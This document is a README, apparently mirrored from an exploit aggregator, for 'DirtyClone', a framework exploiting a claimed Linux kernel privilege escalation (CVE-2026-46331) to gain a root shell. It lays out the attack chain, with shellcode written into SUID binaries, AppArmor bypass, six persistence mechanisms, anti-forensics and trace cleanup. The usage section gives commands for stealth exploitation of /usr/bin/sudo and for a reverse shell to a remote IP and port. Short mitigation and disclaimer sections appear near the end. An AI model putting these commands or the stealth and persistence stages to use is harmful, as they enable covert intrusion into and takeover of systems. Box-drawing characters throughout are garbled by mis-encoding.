Share
## https://sploitus.com/exploit?id=BB4649D8-A88F-5CB7-A1EA-78182D4C96A8
# DirtyClone Exploit Framework
> **CVE-2026-46331** โ Linux Kernel Local Privilege Escalation
> TC pedit + IPsec TEE Page Cache Corruption ยท Affected kernels: โค 6.12.9
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ ____ _ _ ____ _ โ
โ | _ \(_)_ __| |_ _ _/ ___| | ___ _ __ ___ โ
โ | | | | | '__| __| | | | | | |/ _ \| '_ \ / _ \ โ
โ | |_| | | | | |_| |_| | |___| | (_) | | | | __/ โ
โ |____/|_|_| \__|_, |\____|_|\___/|_| |_|\___| โ
โ |___/ โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฃ
โ CVE-2026-46331 ยท v1.0.0 ยท FOR RESEARCH AND EDUCATION ONLY โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
```
[](LICENSE)
[](https://nvd.nist.gov/vuln/detail/CVE-2026-46331)
[]()
[]()
---
> โ ๏ธ **FOR EDUCATIONAL AND RESEARCH PURPOSES ONLY**
> Use this framework exclusively in isolated lab environments that you own
> or have explicit written authorization to test.
> Unauthorized use is illegal and unethical.
---
## ๐ Table of Contents
- [Vulnerability Overview](#-vulnerability-overview)
- [Attack Chain](#-attack-chain)
- [Project Structure](#-project-structure)
- [Requirements](#-requirements)
- [Build & Install](#-build--install)
- [Usage](#-usage)
- [Python Modules](#-python-modules)
- [Defensive Mitigations](#-defensive-mitigations)
- [Timeline](#-timeline)
- [References](#-references)
---
## ๐ฌ Vulnerability Overview
**CVE-2026-46331** is a local privilege escalation vulnerability in the Linux kernel (โค 6.12.9) caused by a race condition between the TC (`cls_act`) `pedit` action and IPsec `TEE`-based packet duplication.
### Root Cause
When a packet traverses the TC egress path with a `pedit` action that sets `IHL = 15`, the kernel's IPsec subsystem receives a malformed packet where the computed IP payload offset exceeds the actual packet boundaries. Under concurrent `sendfile(2)` operations, this mismatch allows an **unprivileged user** (inside a user namespace with `CAP_NET_ADMIN`) to corrupt **read-only page cache** entries of arbitrary files โ including SUID binaries.
### Impact
| Property | Value |
|-------------------|--------------------------------|
| CVSS 3.1 Score | **8.8 (HIGH)** |
| Attack Vector | Local |
| Privileges Required | Low (unprivileged user) |
| Impact | Root shell (`UID=0 EUID=0`) |
| Affected versions | Linux kernel โค 6.12.9 |
| Patched version | 6.12.10 |
| Patch commit | `a3f4d1c8...` |
---
## ๐ Attack Chain
```
Unprivileged User (UID=1000)
โ
โผ
[1] Reconnaissance
โโ Kernel version check
โโ userns availability
โโ Target binary profiling
โ
โผ
[2] Namespace Bypass
โโ unshare(CLONE_NEWUSER|CLONE_NEWNET)
โโ AppArmor profile hopping (fallback)
โโ CAP_NET_ADMIN acquired
โ
โผ
[3] Network Infrastructure
โโ clsact qdisc on lo
โโ pedit filter (IHL=15)
โโ IPsec ESP + TEE
โ
โผ
[4] Page Cache Corruption
โโ sendfile โ pedit trigger
โโ Page cache entry corrupted
โโ Shellcode written to read-only binary
โ
โผ
[5] Privilege Escalation
โโ execve(SUID binary) โ root shell
โ
โผ
[6-8] Post-Exploitation
โโ Persistence (6 mechanisms)
โโ Evasion / Anti-Forensics
โโ Trace cleanup
โ
โผ
๐ฏ ROOT SHELL (UID=0 EUID=0)
```
---
## ๐ Project Structure
```
dirtyclone-exploit/
โโโ Makefile # Build system
โโโ README.md # This file
โโโ LICENSE # MIT License
โ
โโโ include/
โ โโโ exploit.h # Core types, flags, prototypes
โ โโโ packet_engine.h # Packet crafting engine API
โ โโโ memory_ops.h # Page cache corruption API
โ โโโ persistence.h # Persistence mechanism API
โ
โโโ src/
โ โโโ main.c # Framework entry point
โ โโโ stage_env_analysis.c # Phase 1: Reconnaissance
โ โโโ stage_namespace_bypass.c # Phase 2: userns bypass
โ โโโ stage_network_setup.c # Phase 3: TC/IPsec setup
โ โโโ stage_page_cache_corrupt.c # Phase 4: Core exploit
โ โโโ stage_privilege_escalation.c # Phase 5: LPE
โ โโโ stage_persistence.c # Phase 6: Persistence
โ โโโ stage_evasion.c # Phase 7: Anti-forensics
โ โโโ stage_cleanup.c # Phase 8: Trace removal
โ โโโ memory_ops.c # Page cache primitives
โ โโโ packet_engine.c # Raw packet crafting
โ โโโ persistence.c # Persistence implementations
โ
โโโ modules/
โ โโโ packet_craft.py # Python packet crafter (Scapy)
โ โโโ exploit_analyzer.py # Pre-exploit analysis tool
โ
โโโ scripts/
โ โโโ setup_env.sh # Dependency install + build
โ โโโ cleanup.sh # System cleanup
โ โโโ detect_targets.sh # Vulnerable binary scanner
โ
โโโ payloads/
โโโ README.md # Payload directory info
```
---
## โ๏ธ Requirements
### Compile-time
- `gcc` โฅ 10
- `make`
- `libcap-dev` / `libcap-devel`
### Runtime (Linux target)
- Kernel โค 6.12.9
- `iproute2` (tc, ip)
- `iptables`
- Unprivileged user namespaces enabled
### Python modules (optional)
```bash
pip install scapy
```
---
## ๐ง Build & Install
```bash
# Clone
git clone https://github.com/vulnquest58/dirtyclone-exploit
cd dirtyclone-exploit
# Auto setup (installs deps + builds)
sudo bash scripts/setup_env.sh
# Manual build
make all
# Debug build
make debug
# Clean
make clean
```
---
## ๐ Usage
```bash
# Show help
./bin/dirtyclone --help
# Dry run (analysis only, no exploitation)
./bin/dirtyclone --test
# Basic exploitation (default target: /usr/bin/su)
sudo ./bin/dirtyclone
# Custom target with stealth + persistence
sudo ./bin/dirtyclone --target /usr/bin/sudo --stealth --persist
# Reverse shell
sudo ./bin/dirtyclone --remote 192.168.1.100 4444 --cleanup
# Detect vulnerable targets first
bash scripts/detect_targets.sh
```
---
## ๐ Python Modules
### `exploit_analyzer.py` โ Pre-Exploit Reconnaissance
```bash
# Analyze default target
python3 modules/exploit_analyzer.py
# Custom target
python3 modules/exploit_analyzer.py --target /usr/bin/sudo
# JSON output for automation
python3 modules/exploit_analyzer.py --json
# Scan all SUID binaries
python3 modules/exploit_analyzer.py --all-suid
```
### `packet_craft.py` โ Raw Packet Trigger
```bash
# Send exploit packets at offset 0x1234
sudo python3 modules/packet_craft.py --offset 0x1234
# Custom interface and packet count
sudo python3 modules/packet_craft.py --iface eth0 --count 20
```
---
## ๐ก๏ธ Defensive Mitigations
| Mitigation | Command / Action |
|-----------|-----------------|
| **Update kernel** | Upgrade to โฅ 6.12.10 (primary fix) |
| **Disable user namespaces** | `echo 0 > /proc/sys/kernel/unprivileged_userns_clone` |
| **AppArmor restrictions** | Enable `apparmor` with `userns` restriction profile |
| **Audit TC pedit** | `auditctl -a always,exit -F arch=b64 -S unshare` |
| **File integrity** | Deploy AIDE or Tripwire on SUID binaries |
| **Seccomp filters** | Block `unshare()` in production containers |
---
## ๐
Timeline
| Date | Event |
|------|-------|
| 2026-01-15 | Vulnerability discovered during kernel audit |
| 2026-02-03 | Reported to security@kernel.org |
| 2026-03-28 | Patch committed (6.12.10) |
| 2026-06-01 | Public disclosure (90-day deadline) |
| 2026-06-27 | Full PoC released |
---
## ๐ References
- [CVE-2026-46331 NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2026-46331)
- [Linux Kernel TC Subsystem Documentation](https://www.kernel.org/doc/html/latest/networking/tc-actions-env-rules.html)
- [IPsec TEE Implementation](https://www.kernel.org/doc/html/latest/networking/xfrm_proc.html)
- [User Namespace Security](https://www.man7.org/linux/man-pages/man7/user_namespaces.7.html)
- [DirtyClone Technical Write-up](https://vulnquest58.github.io/CVE-2026-46331/)
---
## ๐ค Author
**VulnQuest** ยท Security Research
- ๐ [vulnquest58.github.io](https://vulnquest58.github.io)
- ๐ [Bug Bounty Portfolio](https://vulnquest58.github.io/bugbounty/)
---
*This repository is provided for educational purposes only.*
*All exploitation code is intended for use in authorized lab environments.*